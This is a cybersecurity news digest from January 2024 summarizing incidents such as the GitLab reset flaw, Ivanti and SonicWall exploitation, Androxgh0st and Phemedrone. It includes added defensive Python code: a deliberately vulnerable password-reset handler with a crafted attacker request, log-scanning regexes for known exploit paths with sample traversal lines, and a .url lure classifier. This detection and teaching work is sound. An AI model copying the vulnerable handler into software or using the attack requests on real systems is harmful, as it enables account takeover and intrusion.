            Autosummary: “The attack vector included the scanning and identification of externally facing Mac services to include the Apple Filing Protocol (AFP, port 548), RDP, VNC, SSH (port 22), and Back to My Mac (BTMM), which would be targeted with weak passwords or passwords derived from 3rd party data breaches.” Durachinsky was charged with 16 counts, including accessing and damaging computers without authorization, accessing a non-public government computer without authorization, production of child pornography, three counts of wire fraud, four counts of aggravated identity theft, and five counts of illegal wiretapping. On January 4, 2017, Case Western Reserve University (CWRU), located in Cleveland, Ohio, became aware of an infection on more than 100 of its computers. In 2012, as a senior soon to graduate with a physics degree, he worked on a project with faculty member Robert W. Brown regarding nanoparticle behavior, assisting with software to visualize the behavior in 3D. However, Durachinsky was frequently in trouble for his other computing activities. "


            “I’ll miss him so much” Facebook scam uses BBC branding to lure victims

            financial
            2024-01-16 https://www.malwarebytes.com/blog/news/2024/01/ill-miss-him-so-much-facebook-scam-uses-bbc-branding-to-lure-victims
            We found a Facebook scam that aims to redirect victims to sites promoting PUPs, adware, or other fraudulent sites. "

            Autosummary: All composed like this: “BBCNEWS-{6 characters}.OMH4.XYZ”. Clicking the play button takes you through several redirects, very likely to perform fingerprinting, where sites gather information about your browser, your location, and other sites you’ve visited. This post features a slightly different text: “I can’t believe this, I’m going to miss him so much”. The BBC news logo in the picture and the BBCNEWS part of the URL are obviously intended to gain your trust, and suggest that it’s safe to play the video. "


            GitLab warns zero-click vulnerability could lead to account takeovers

            exploits
            2024-01-16 https://www.malwarebytes.com/blog/news/2024/01/gitlab-warns-zero-click-vulnerability-could-lead-to-account-takeovers
            GitLab has warned about a critical vulnerability that allows an attacker to change passwords without user interaction. "

            Autosummary: CVE-2023-7028 (CVSS score 10 out of 10): an issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address. "
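The advisory text above describes the symptom: a reset email going to an address the account never verified. As an added illustration (hypothetical Python written for this page, not GitLab's Ruby code), here is that bug class beside its fix. The trigger used is the one publicly documented for CVE-2023-7028: a form that submits the email field as an array, so a second, attacker-controlled address rides along with the victim's. The in-memory account store, the handler names and the returned recipient list are assumptions for the example; a real handler would hand the recipients to a mailer.

```python
import secrets

# Constructed in-memory account directory (assumption for the example);
# each account has exactly one verified address on file.
USERS = {
    "alice@example.com": {"id": 1, "verified_email": "alice@example.com"},
}
RESET_TOKENS = {}  # user id -> outstanding reset token


def _as_list(value):
    return value if isinstance(value, list) else [value]


def request_reset_vulnerable(form):
    """The bug class, reduced to its essence. A Rails-style 'user[email][]'
    parameter arrives as a list; the account is located through any element,
    and the token is mailed to every element, including an address the
    account owner never verified. Returns the (recipient, token) pairs."""
    addresses = [a for a in _as_list(form.get("user[email]")) if isinstance(a, str)]
    user = None
    for addr in addresses:
        user = USERS.get(addr.strip().lower())
        if user is not None:
            break
    if user is None:
        return []  # unknown account: nothing sent
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[user["id"]] = token
    return [(addr, token) for addr in addresses]  # attacker's address gets the link too


def request_reset_hardened(form):
    """Accept exactly one plain-string address, and deliver only to the address
    the account has on file and verified, never to anything taken from the request."""
    raw = form.get("user[email]")
    if not isinstance(raw, str) or any(c in raw for c in "\r\n,;"):
        return []  # arrays, header injection, address lists: refuse outright
    user = USERS.get(raw.strip().lower())
    if user is None:
        return []  # caller renders the same "check your inbox" page either way
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[user["id"]] = token
    return [(user["verified_email"], token)]


# Constructed attacker request: the victim's address plus one the attacker controls.
ATTACK_FORM = {"user[email]": ["alice@example.com", "attacker@evil.example"]}

if __name__ == "__main__":
    print("vulnerable delivers to:", [a for a, _ in request_reset_vulnerable(ATTACK_FORM)])
    print("hardened delivers to:  ", [a for a, _ in request_reset_hardened(ATTACK_FORM)])
```

The fix is not "validate the email better"; it is that the request-supplied string is only ever used to look the account up, and the recipient is always the stored, verified address.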


            Inferno Malware Masqueraded as Coinbase, Drained $87 Million from 137,000 Victims

            exploits
            2024-01-16 https://thehackernews.com/2024/01/inferno-malware-masqueraded-as-coinbase.html
            The operators behind the now-defunct Inferno Drainer created more than 16,000 unique malicious domains over a span of one year between 2022 and 2023. The scheme “leveraged high-quality phishing pages to lure unsuspecting users into connecting their cryptocurrency wallets with the attackers’ infrastructure that spoofed Web3 protocols to trick victims into authorizing transactions,” "

            Autosummary: "Inferno Drainer may have ceased its activity, but its prominence throughout 2023 highlights the severe risks to cryptocurrency holders as drainers continue to develop further," Andrey Kolmakov, head of Group-IB’s High-Tech Crime Investigation Department, said. "


            Experts warn of mass exploitation of Ivanti Connect Secure VPN flaws

            exploits
            2024-01-16 https://securityaffairs.com/157558/hacking/ivanti-connect-secure-vpn-flaws-attacks.html
            Experts warn that recently disclosed Ivanti Connect Secure VPN and Policy Secure vulnerabilities are massively exploited in the wild. Last week, software firm Ivanti reported that threat actors are exploiting two zero-day vulnerabilities (CVE-2023-46805, CVE-2024-21887) in Connect Secure (ICS) and Policy Secure to remotely execute arbitrary commands on targeted gateways. The flaw CVE-2023-46805 (CVSS score […] "

            Autosummary: The list of targets includes multiple Fortune 500 companies operating in various industry sectors, such as:
            - Global government and military departments
            - National telecommunications companies
            - Defense contractors
            - Technology firms
            - Banking, finance, and accounting institutions
            - Worldwide consulting services
            - Aerospace, aviation, and engineering entities
            “Investigations of newly found compromised devices showed they had been backdoored with a slightly different variant of the GIFTEDVISITOR webshell documented in the “visits.py modification – GIFTEDVISITOR” section of Volexity’s recent blog post. "


            The Dual Role AI Plays in Cybersecurity: How to Stay Ahead

            ciber
            2024-01-16 https://www.bleepingcomputer.com/news/security/the-dual-role-ai-plays-in-cybersecurity-how-to-stay-ahead/
            AI presents significant advantages for organizations, but it’s also being exploited to amplify and intensify cyberattacks. Learn more from Outpost24 about how hackers are harnessing the power of AI. [...] "

            Autosummary: How hackers are harnessing the power of AI: Hackers are leveraging AI tools to augment their cybercrimes, enhancing the success, scale, and scope of their attacks in various ways, including: Improving social engineering tactics: Hackers are using AI to enhance the quality of their social engineering content. By leveraging AI, they can generate grammatically accurate and error-free web content, text messages, phishing emails, and even highly convincing voicemails. "


            Alert: Over 178,000 SonicWall Firewalls Potentially Vulnerable to Exploits - Act Now

            exploits
            2024-01-16 https://thehackernews.com/2024/01/alert-over-178000-sonicwall-firewalls.html
            Over 178,000 SonicWall firewalls exposed on the internet are vulnerable to at least one of two security flaws that could potentially be exploited to cause a denial-of-service (DoS) condition or remote code execution (RCE). “The two issues are fundamentally the same but exploitable at different HTTP URI paths due to reuse of a vulnerable code pattern,” Jon Williams, a senior security "

            Autosummary: "


            Google fixes first actively exploited Chrome zero-day of 2024

            exploits
            2024-01-16 https://www.bleepingcomputer.com/news/security/google-fixes-first-actively-exploited-chrome-zero-day-of-2024/
            Google has released security updates to fix the first Chrome zero-day vulnerability exploited in the wild since the start of the year. [...] "

            Autosummary: Last year, Google fixed eight Chrome zero-day bugs exploited in attacks tracked as CVE-2023-7024, CVE-2023-6345, CVE-2023-5217, CVE-2023-4863, CVE-2023-3079, CVE-2023-4762, CVE-2023-2136, and CVE-2023-2033. "


            Majorca city Calvià extorted for $11M in ransomware attack

            exploits government ransomware
            2024-01-16 https://www.bleepingcomputer.com/news/security/majorca-city-calvi-extorted-for-11m-in-ransomware-attack/
            The Calvià City Council in Majorca announced it was targeted by a ransomware attack on Saturday, which impacted municipal services. [...] "

            Autosummary: "The Calvià City Council is working to restore normality as soon as possible, after having been the target, in the early hours of last Saturday, of a ransomware cyberattack, through which they intend to extort the council," says the announcement from Calvià. "


            FBI: Androxgh0st malware botnet steals AWS, Microsoft credentials

            exploits
            2024-01-16 https://www.bleepingcomputer.com/news/security/fbi-androxgh0st-malware-botnet-steals-aws-microsoft-credentials/
            CISA and the FBI warned today that threat actors using Androxgh0st malware are building a botnet focused on cloud credential theft and using the stolen information to deliver additional malicious payloads. [...] "

            Autosummary: RCE flaws targeted in these attacks include CVE-2017-9841 (PHPUnit), CVE-2021-41773 (Apache HTTP Server), and CVE-2018-15133 (Laravel). "
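The three CVEs named above each leave a distinctive request path in ordinary web-server access logs, which makes them a cheap hunt. The following is an added example (my code, not CISA's, the FBI's or BleepingComputer's) that scans combined-log-format lines for those paths; the log lines are constructed for the example. The first two rules are the well-known exploitation paths for CVE-2017-9841 and CVE-2021-41773. The third rule is an assumption made here: abuse of CVE-2018-15133 needs the Laravel APP_KEY, which the botnet obtains by fetching exposed `.env` files, and since the X-XSRF-TOKEN header that carries the actual payload never appears in an access log, the `/.env` fetch is the observable precursor. That reconnaissance step is not described on this page.

```python
import re
from dataclasses import dataclass

# Apache/nginx combined or common log format:
#   ip ident user [timestamp] "METHOD path PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Request-path signatures. The first two are the well-known exploitation paths
# for the named CVEs. The third is an assumption for this example: the botnet
# fetches exposed Laravel .env files to obtain APP_KEY, the secret that
# CVE-2018-15133 (deserialization via the X-XSRF-TOKEN header) requires; the
# header itself is not in an access log, so the .env fetch is what you can see.
RULES = (
    ("CVE-2017-9841 PHPUnit eval-stdin.php",
     re.compile(r"phpunit/src/Util/PHP/eval-stdin\.php", re.I)),
    ("CVE-2021-41773 Apache 2.4.49 cgi-bin path traversal",
     re.compile(r"/cgi-bin/.*?(?:\.%2e|%2e%2e|%2e\.)/", re.I)),
    ("Laravel .env exposure probe (precursor to CVE-2018-15133)",
     re.compile(r"/\.env(?:$|\?)")),
)


@dataclass(frozen=True)
class Hit:
    ip: str
    rule: str
    method: str
    path: str
    status: int


def scan_log(lines):
    """Return one Hit per request line that matches a rule; unparsable lines are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, pattern in RULES:
            if pattern.search(m["path"]):
                hits.append(Hit(m["ip"], name, m["method"], m["path"], int(m["status"])))
                break
    return hits


def sources_with_2xx(hits):
    """Source IPs whose attempt got a 2xx back. A 200 on eval-stdin.php or on
    /.env means the target answered, not merely that it was probed."""
    return sorted({h.ip for h in hits if 200 <= h.status < 300})


# Constructed sample log lines (not real traffic); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Jan/2024:10:01:02 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 54',
    '203.0.113.7 - - [16/Jan/2024:10:01:05 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1327',
    '203.0.113.7 - - [16/Jan/2024:10:01:09 +0000] "GET /.env HTTP/1.1" 200 812',
    '198.51.100.20 - - [16/Jan/2024:10:02:00 +0000] "GET /.env HTTP/1.1" 404 196',
    '198.51.100.20 - - [16/Jan/2024:10:02:03 +0000] "GET /cgi-bin/status HTTP/1.1" 200 77',
    '198.51.100.20 - - [16/Jan/2024:10:02:07 +0000] "GET /environment/index.php HTTP/1.1" 200 4420',
    "not a log line",
]

if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for h in found:
        print(f"{h.ip:15} {h.status} {h.method:4} {h.path}  <- {h.rule}")
    print("answered with 2xx:", sources_with_2xx(found))
```

Hosts that answered a 2xx to any of these go to the top of the triage list; a 404 on `/.env` is a scan you were part of, a 200 is a leaked secret.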


            Citrix warns of new Netscaler zero-days exploited in attacks

            exploits
            2024-01-16 https://www.bleepingcomputer.com/news/security/citrix-warns-of-new-netscaler-zero-days-exploited-in-attacks/
            Citrix urged customers on Tuesday to immediately patch Netscaler ADC and Gateway appliances exposed online against two actively exploited zero-day vulnerabilities. [...] "

            Autosummary: The list of Netscaler product versions affected by these two zero-day vulnerabilities includes the following:
            - NetScaler ADC and NetScaler Gateway 14.1 before 14.1-12.35
            - NetScaler ADC and NetScaler Gateway 13.1 before 13.1-51.15
            - NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.21
            - NetScaler ADC 13.1-FIPS before 13.1-37.176
            - NetScaler ADC 12.1-FIPS before 12.1-55.302
            - NetScaler ADC 12.1-NDcPP before 12.1-55.302
            According to data provided by threat monitoring platform Shadowserver, just over 1,500 Netscaler management interfaces are now exposed on the Internet. "


            Google fixed the first actively exploited Chrome zero-day of 2024

            exploits
            2024-01-16 https://securityaffairs.com/157600/security/google-first-chrome-zero-day-2024.html
            Google has released security updates to address the first Chrome zero-day vulnerability of the year, which is actively being exploited in the wild. The high-severity vulnerability, tracked as CVE-2024-0519, is an out-of-bounds memory access […] "

            Autosummary: "


            Government organizations’ readiness in the face of cyber threats

            government
            2024-01-15 https://www.helpnetsecurity.com/2024/01/15/government-organizations-cyber-threats-video/

            Cyber threats targeting government organizations have become increasingly sophisticated, posing significant risks to national security, public infrastructure, and sensitive data. These threats are diverse in nature, originating from various actors such as nation-states, hacktivist groups, and organized cybercrime entities. Governments must invest in robust cybersecurity measures, including advanced threat detection systems, employee training programs, and the continuous monitoring of critical infrastructure. Additionally, international cooperation and information sharing are crucial to combating threats that transcend national … More

            The post Government organizations’ readiness in the face of cyber threats appeared first on Help Net Security.

            "

            Autosummary: "


            Apple fixed a bug in Magic Keyboard that allows to monitor Bluetooth traffic

            exploits
            2024-01-15 https://securityaffairs.com/157448/hacking/apple-bug-monitor-bluetooth-traffic.html
            Apple addressed a recently disclosed Bluetooth keyboard injection vulnerability with the release of Magic Keyboard firmware. Apple released Magic Keyboard Firmware Update 2.0.6 to address a recently disclosed Bluetooth keyboard injection issue tracked as CVE-2024-0230. The flaw is a session management issue that can be exploited by an attacker with physical access to the accessory […] "

            Autosummary: "


            Flipping the BEC funnel: Phishing in the age of GenAI

            financial
            2024-01-15 https://www.helpnetsecurity.com/2024/01/15/genai-tools-phishing/

            For years, phishing was just a numbers game: A malicious actor would slap together an extremely generic (and usually poorly-written) email and fire it out to thousands of recipients in the hope that a few might take the bait. Over time, however, as spam filters and other email security tools became increasingly effective at filtering out such emails, threat actors adapted and began leveraging new techniques to circumvent these technologies. Common among these new techniques … More

            The post Flipping the BEC funnel: Phishing in the age of GenAI appeared first on Help Net Security.

            "

            Autosummary: Over time, as these tools are exposed to more and more of an organization’s communications, the better they become at detecting such anomalies, such as word choice, syntax, sentence structure, and length, along with countless other parameters that a human reader would most likely overlook. All told, AI-enabled tools offer unparalleled adaptability, efficiency, and detection capabilities — all while making life easier for the often overworked, overwhelmed, and understaffed SOC teams that remain so essential to our world’s collective security posture. From there, organizations can offer more targeted training simulations tailored to each employee, based on their experience, knowledgeability, department, title, and so on. Additionally, these tools expedite open-source intelligence (OSINT) gathering by swiftly collecting information about targets, including personal details, preferences, behaviors, and comprehensive company data. "


            DDoS Attacks on the Environmental Services Industry Surge by 61,839% in 2023

            industry
            2024-01-15 https://thehackernews.com/2024/01/ddos-attacks-on-environmental-services.html
            The environmental services industry witnessed an “unprecedented surge” in HTTP-based distributed denial-of-service (DDoS) attacks, accounting for half of all its HTTP traffic. This marks a 61,839% increase in DDoS attack traffic year-over-year, web infrastructure and security company Cloudflare said in its DDoS threat report for 2023 Q4 published last week. “This surge in cyber attacks coincided "

            Autosummary: Akamai, which also published its own retrospective on DDoS Trends in 2023, said "DDoS attacks became more frequent, longer, highly sophisticated (with multiple vectors), and focused on horizontal targets (attacking multiple IP destinations in the same attack event). "


            Balada Injector Infects Over 7,100 WordPress Sites Using Plugin Vulnerability

            exploits
            2024-01-15 https://thehackernews.com/2024/01/balada-injector-infects-over-7100.html
            Thousands of WordPress sites using a vulnerable version of the Popup Builder plugin have been compromised with a malware called Balada Injector. First documented by Doctor Web in January 2023, the campaign takes place in a series of periodic attack waves, weaponizing security flaws in WordPress plugins to inject a backdoor designed to redirect visitors of infected sites to bogus tech "

            Autosummary: "When successfully exploited, this vulnerability may let attackers perform any action the logged‑in administrator they targeted is allowed to do on the targeted site, including installing arbitrary plugins, and creating new rogue Administrator users," "


            Balada Injector continues to infect thousands of WordPress sites

            ransomware
            2024-01-15 https://securityaffairs.com/157470/malware/balada-injector-malware-wordpress-sites.html
            Balada Injector malware has infected more than 7,100 WordPress sites using a vulnerable version of the Popup Builder plugin. In September 2023, Sucuri researchers reported that more than 17,000 WordPress websites had been compromised with the Balada Injector that month, double the number of infections seen in August 2023. The Balada […] "

            Autosummary: In the recent wave of attacks, if threat actors detect logged-in admin cookies, they exploit the issue to install and activate a rogue backdoor plugin (“wp-felody.php” or “Wp Felody”) and load a second-stage payload from specialcraftbox[.]com. "


            Fidelity National Financial acknowledges data breach affecting 1.3 million customers

            financial
            2024-01-15 https://www.malwarebytes.com/blog/news/2024/01/fidelity-national-financial-acknowledges-data-breach-affecting-1-3-million-customers
            Fidelity National Financial has suffered a ransomware attack and resulting data breach which involved 1.3 million of its customers’ data. "

            Autosummary: Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "


            Heartless scammers prey on hundreds of lost pet owners, demanding ransoms or else…

            financial
            2024-01-15 https://www.bitdefender.com/blog/hotforsecurity/heartless-scammers-prey-on-hundreds-of-lost-pet-owners-demanding-ransoms-or-else/
            Hundreds of pet owners across the UK have reported that they have received blackmail threats from scammers who claim to have found their lost pooches and missing moggies. Read more in my article on the Hot for Security blog. "

            Autosummary: As BBC News reports, fraudsters are combing online forums where desperate owners post messages about their lost pets, and then demand thousands of pounds in "reward" for the animal’s safe return. "


            Windows SmartScreen bug exploited to deliver powerful info-stealer (CVE-2023-36025)

            exploits
            2024-01-15 https://www.helpnetsecurity.com/2024/01/15/cve-2023-36025-exploited/

            A vulnerability (CVE-2023-36025) that Microsoft fixed in November 2023 continues to be exploited by malware peddlers: this time around, the delivered threat is a variant of the Phemedrone Stealer. About the malware Phemedrone Stealer is a piece of malware written in C#, with no dependencies. It’s capable of: Collecting system information (hardware, OS, geolocation) and making screenshots Gathering all data contained in the targeted device’s memory Grabbing user files from specific folders (e.g., Documents, Desktop) … More

            The post Windows SmartScreen bug exploited to deliver powerful info-stealer (CVE-2023-36025) appeared first on Help Net Security.

            "

            Autosummary: Grabbing cookies, passwords, and autofills from Chromium-based browsers (Google Chrome, Microsoft Edge, Opera, Brave, etc.) and Gecko-based browsers (e.g., Firefox) "


            Opera MyFlaw Bug Could Let Hackers Run ANY File on Your Mac or Windows

            exploits
            2024-01-15 https://thehackernews.com/2024/01/opera-myflaw-bug-could-let-hackers-run.html
            Cybersecurity researchers have disclosed a security flaw in the Opera web browser for Microsoft Windows and Apple macOS that could be exploited to execute any file on the underlying operating system. The remote code execution vulnerability has been codenamed MyFlaw by the Guardio Labs research team owing to the fact that it takes advantage of a feature called My Flow that makes it "

            Autosummary: "This is exactly what an attacker needs – an unsafe, forgotten, vulnerable to code injection asset, and most importantly, has access to (very) high permission native browser API." "


            3 Ransomware Group Newcomers to Watch in 2024

            exploits ransomware
            2024-01-15 https://thehackernews.com/2024/01/3-ransomware-group-newcomers-to-watch.html
            The ransomware industry surged in 2023 as it saw an alarming 55.5% increase in victims worldwide, reaching a staggering 4,368 cases.  Figure 1: Year over year victims per quarter The rollercoaster ride from explosive growth in 2021 to a momentary dip in 2022 was just a teaser—2023 roared back with the same fervor as 2021, propelling existing groups and ushering in a wave of formidable "

            Autosummary: Known TTPs (tactic: technique):
            - Defense Evasion: T1564 - Hide Artifacts
            - Discovery: T1083 - File and Directory Discovery
            - Discovery: T1010 - Application Window Discovery
            - Discovery: T1082 - System Information Discovery
            - Discovery: T1057 - Process Discovery
            - Discovery: T1518.001 - Security Software Discovery
            - Initial Access: T1566 - Phishing
            - Collection: T1005 - Data from Local System
            - Collection: T1119 - Automated Collection
            - Resource Development: T1587 - Develop Capabilities
            - Resource Development: T1583 - Acquire Infrastructure
            - Execution: T1129 - Shared Modules
            - Execution: T1059 - Command and Scripting Interpreter
            - Reconnaissance: T1595 - Active Scanning
            - Reconnaissance: T1598 - Phishing for Information
            The Akira Group: The Akira Group was discovered in March 2023 and has claimed 81 victims to date. Known TTPs (tactic: technique):
            - Exfiltration: T1567 - Exfiltration Over Web Service
            - Initial Access: T1566.001 - Spearphishing Attachment
            - Exfiltration: T1041 - Exfiltration Over C2 Channel
            - Exfiltration: T1537 - Transfer Data to Cloud Account
            - Collection: T1114.001 - Local Email Collection
            - Impact: T1486 - Data Encrypted for Impact
            - Initial Access: T1566.002 - Spearphishing Link
            - Execution: T1059.001 - PowerShell
            - Execution: T1569.002 - Service Execution
            - Discovery: T1016.001 - Internet Connection Discovery
            - Initial Access: T1078 - Valid Accounts
            - Privilege Escalation: T1078 - Valid Accounts
            In 2024, Cyberint anticipates several of these newer groups to enhance their capabilities and emerge as dominant players in the industry alongside veteran groups like LockBit 3.0, Cl0p, and AlphV. Read Cyberint’s 2023 Ransomware Report for the top targeted industries and countries, a breakdown of the top 3 ransomware groups, ransomware families worth noting, newcomers to the industry, notable 2023 campaigns, and 2024 forecasts.
            Known TTPs (tactic: technique):
            - Resource Development: T1650 - Acquire Access
            - Collection: T1560 - Archive Collected Data
            - Impact: T1565.001 - Stored Data Manipulation
            - Collection: T1532 - Archive Collected Data
            - Collection: T1005 - Data from Local System
            Rhysida Ransomware: The Rhysida ransomware group came into the spotlight in May/June 2023 when they launched a victim support chat portal accessible through their TOR (.onion) site. "


            Phemedrone info stealer campaign exploits Windows smartScreen bypass

            exploits
            2024-01-15 https://securityaffairs.com/157496/hacking/phemedrone-info-stealer-campaign-exploit-cve-2023-36025.html
            Threat actors exploit a recent Windows SmartScreen bypass flaw CVE-2023-36025 to deliver the Phemedrone info stealer. Trend Micro researchers uncovered a malware campaign exploiting the vulnerability CVE-2023-36025 (CVSS score 8.8) to deploy a previously unknown strain of the malware dubbed Phemedrone Stealer. The vulnerability was addressed by Microsoft with the release of Patch Tuesday security updates for […] "

            Autosummary: “Despite having been patched, threat actors continue to find ways to exploit CVE-2023-36025 and evade Windows Defender SmartScreen protections to infect users with a plethora of malware types, including ransomware and stealers like Phemedrone Stealer.” concludes the report. "


            Windows SmartScreen flaw exploited to drop Phemedrone malware

            exploits
            2024-01-15 https://www.bleepingcomputer.com/news/security/windows-smartscreen-flaw-exploited-to-drop-phemedrone-malware/
            A Phemedrone information-stealing malware campaign exploits a Microsoft Defender SmartScreen vulnerability (CVE-2023-36025) to bypass Windows security prompts when opening URL files. [...] "

            Autosummary: Trend Micro reports that Phemedrone targets the following apps/data: Chromium browsers: harvests passwords, cookies, and autofill from browsers and security apps like LastPass, KeePass, Microsoft Authenticator, and Google Authenticator. (Figure: Malicious URL file used in Phemedrone campaign. Source: BleepingComputer.) The DLL is a PowerShell loader that fetches a ZIP file from a GitHub repository containing the second-stage loader masqueraded as a PDF file (Secure.pdf), a legitimate Windows binary (WerFaultSecure.exe), and "wer.dll," used in DLL side-loading and to establish persistence. "
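Internet Shortcut (.url) files are plain INI text, so a mail gateway or endpoint agent can inspect where one points before a user double-clicks it. The following is an added example (my code, not Trend Micro's or BleepingComputer's) that parses a .url file and flags the traits of a download-and-run lure: a target on a remote SMB/WebDAV share or a `file://` host, or a target that Windows executes rather than displays. The sample files are constructed. The shape they mimic, a shortcut resolving to a .cpl on an attacker-controlled WebDAV share, comes from the vendor analysis of this campaign rather than from this page, and the executable-extension list is an assumption.

```python
import configparser
from urllib.parse import urlsplit, unquote

# File types Windows runs rather than displays when a shortcut resolves to them
# (assumption for the example; extend to taste).
EXECUTABLE_EXT = (".cpl", ".exe", ".dll", ".scr", ".hta", ".js", ".jse",
                  ".vbs", ".lnk", ".msi", ".bat", ".cmd")


def shortcut_target(text):
    """Return the URL= value from an Internet Shortcut (.url) file, which is
    INI text, or None if there is no [InternetShortcut] section with a URL key."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    return cp.get("InternetShortcut", "URL", fallback=None)


def classify_url_file(text):
    """Reasons the shortcut looks like a download-and-run lure; an empty list
    means it is an ordinary web link."""
    target = shortcut_target(text)
    if target is None:
        return ["no parsable URL= entry"]
    target = target.strip()
    reasons = []
    if target.startswith("\\\\"):
        # UNC path; an '@80' or '@SSL' host suffix selects the WebDAV redirector
        reasons.append("UNC target (SMB or WebDAV share)")
        path = target.replace("\\", "/")
    else:
        parts = urlsplit(target)
        path = unquote(parts.path)
        scheme = parts.scheme.lower()
        if scheme == "file" and parts.netloc:
            reasons.append(f"file:// pointing at remote host {parts.netloc}")
        elif scheme not in ("http", "https"):
            reasons.append(f"unexpected scheme {scheme or '(none)'}")
    if path.lower().endswith(EXECUTABLE_EXT):
        reasons.append(f"target is an executable type ({path.rsplit('.', 1)[-1]})")
    return reasons


# Constructed samples, not files recovered from the campaign.
LURE_FILE_SCHEME = "[InternetShortcut]\nURL=file://203.0.113.9/share/Secure.cpl\nIconIndex=13\n"
LURE_UNC_WEBDAV = "[InternetShortcut]\nURL=\\\\203.0.113.9@80\\share\\Secure.cpl\n"
BENIGN_LINK = "[InternetShortcut]\nURL=https://www.example.com/report.pdf\n"
NOT_A_SHORTCUT = "[Desktop Entry]\nExec=/usr/bin/true\n"

if __name__ == "__main__":
    for name, sample in [("file scheme", LURE_FILE_SCHEME), ("unc webdav", LURE_UNC_WEBDAV),
                         ("benign", BENIGN_LINK), ("not a shortcut", NOT_A_SHORTCUT)]:
        print(f"{name:15} {classify_url_file(sample)}")
```

The check is deliberately about the destination rather than the SmartScreen bypass itself: a patched host still has no business following a .url to a control-panel item on someone else's WebDAV server, so this rule keeps paying after CVE-2023-36025 is closed.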


            US court docs expose fake antivirus renewal phishing tactics

            financial industry
            2024-01-15 https://www.bleepingcomputer.com/news/security/us-court-docs-expose-fake-antivirus-renewal-phishing-tactics/
            In a seizure warrant application, the U.S. Secret Service sheds light on how threat actors stole $34,000 using fake antivirus renewal subscription emails. [...] "

            Autosummary: The victim calls the phone number listed on the email, and from there, the scammers direct them to perform various actions such as installing remote access software on their computers, infecting themselves with malware, and entering their account credentials on a phishing page. "


            Week in review: GitLab account takeover flaw, attackers exploiting Ivanti Connect Secure zero-days

            exploits
            2024-01-14 https://www.helpnetsecurity.com/2024/01/14/week-in-review-gitlab-account-takeover-flaw-attackers-exploiting-ivanti-connect-secure-zero-days/

            Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Social engineer reveals effective tricks for real-world intrusions In this Help Net Security interview, Jayson E. Street, Chief Adversarial Officer at Secure Yeti, discusses intriguing aspects of social engineering and unconventional methods for gathering target information. Understanding zero-trust design philosophy and principles In this Help Net Security interview, Phil Vachon, Head of Infrastructure in the Office of the CTO at … More

            The post Week in review: GitLab account takeover flaw, attackers exploiting Ivanti Connect Secure zero-days appeared first on Help Net Security.

            "

            Autosummary: Ivanti Connect Secure zero-days exploited by attackers (CVE-2023-46805, CVE-2024-21887) Two zero-day vulnerabilities (CVE-2023-46805, CVE-2024-21887) in Ivanti Connect Secure VPN devices are under active exploitation by unknown attackers, Volexity researchers have discovered. "


            New Findings Challenge Attribution in Denmark’s Energy Sector Cyberattacks

            industry ciber
            2024-01-14 https://thehackernews.com/2024/01/new-findings-challenge-attribution-in.html
            The cyber attacks targeting the energy sector in Denmark last year may not have had the involvement of the Russia-linked Sandworm hacking group, new findings from Forescout show. The intrusions, which targeted around 22 Danish energy organizations in May 2023, occurred in two distinct waves, one which exploited a security flaw in Zyxel firewall (CVE-2023-28771) and a "

            Autosummary: "


            GrapheneOS: Frequent Android auto-reboots block firmware exploits

            exploits
            2024-01-14 https://www.bleepingcomputer.com/news/security/grapheneos-frequent-android-auto-reboots-block-firmware-exploits/
            GrapheneOS, a privacy and security-focused Android-based operating system, has posted a series of tweets on X suggesting that Android should introduce frequent auto-reboots to make it harder for forensic software vendors to exploit firmware flaws and spy on the users. [...] "

            Autosummary: Rebooting the device terminates all temporary states, processes, or activities that could be exploited and requires authentication like PIN, password, or biometric verification to unlock, thereby re-engaging all security mechanisms. "


            Attacks against Denmark’s energy sector were not carried out by Russia-linked APT

            industry
            2024-01-14 https://securityaffairs.com/157438/hacking/denmark-energy-sector-attacks-attribution.html
            Forescout experts questioned the attribution of cyber attacks that targeted the energy sector in Denmark in 2023 to the Russia-linked Sandworm. Forescout experts shared findings from their analysis of the cyber attacks that targeted the energy sector in Denmark in 2023, attributing them to the Russia-linked Sandworm. In May, Danish critical infrastructure faced the biggest […] "

            Autosummary: The report includes a Cyber Kill Chain diagram for the overall attack (figure not reproduced in this summary). “To this day, there is no clear explanation of how the attackers had the necessary information, but we can state that among the 300 members, they did not miss a single shot.” continues the report. On April 25, 2023, Zyxel disclosed a critical vulnerability (CVSS score 9.8), tracked as CVE-2023-28771, in a number of their firewalls. "


            Critical RCE Vulnerability Uncovered in Juniper SRX Firewalls and EX Switches

            exploits
            2024-01-13 https://thehackernews.com/2024/01/critical-rce-vulnerability-uncovered-in.html
            Juniper Networks has released updates to fix a critical remote code execution (RCE) vulnerability in its SRX Series firewalls and EX Series switches. The issue, tracked as CVE-2024-21591, is rated 9.8 on the CVSS scoring system. “An out-of-bounds write vulnerability in J-Web of Juniper Networks Junos OS SRX Series and EX Series allows an unauthenticated, network-based attacker to cause a "

            Autosummary: "


            29-Year-Old Ukrainian Cryptojacking Kingpin Arrested for Exploiting Cloud Services

            exploits
            2024-01-13 https://thehackernews.com/2024/01/29-year-old-ukrainian-cryptojacking.html
